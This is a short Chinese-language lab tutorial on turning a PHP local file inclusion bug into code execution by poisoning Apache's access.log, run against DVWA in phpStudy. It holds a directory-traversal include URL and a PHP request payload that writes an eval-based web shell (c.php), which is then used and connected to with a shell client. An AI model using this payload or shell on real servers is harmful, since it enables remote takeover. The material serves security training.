日志文件漏洞原理
当某个PHP文件存在本地包含漏洞,而却无法上传正常文件,这就意味这有包含漏洞却不能拿来利用,这时攻击者就有可能会利用apache日志文件来入侵。
Apache服务器运行后会生成两个日志文件,这两个文件是access.log(访问日志)和error.log(错误日志),apache的日志文件记录下我们的操作,并且写到访问日志文件access.log
之中
例如:http://192.168.1.55:8080/dvwa/vulnerabilities/fi/?page=../../../../Apache-20\logs\access.log
实验环境:
环境配置:
打开Apache的配置文件
搜索CustomLog "logs/access.log" common
将前面的注释去掉,然后重启PHPstudy
模拟实验:
1、在当前网页抓包
2、发送到Repeater
模块
3、将url改为<?php $file = fopen('c.php','w');fputs($file,'<?php @eval($_REQUEST[666]);?>')?>
然后点击GO
4、访问C:\\phpStudy\\PHPTutorial\\Apache\\logs\\access.log
路径,如下图成功执行
5、在fi
下输入c.php?666=phpinfo();
成功执行
6、复制url使用菜刀连接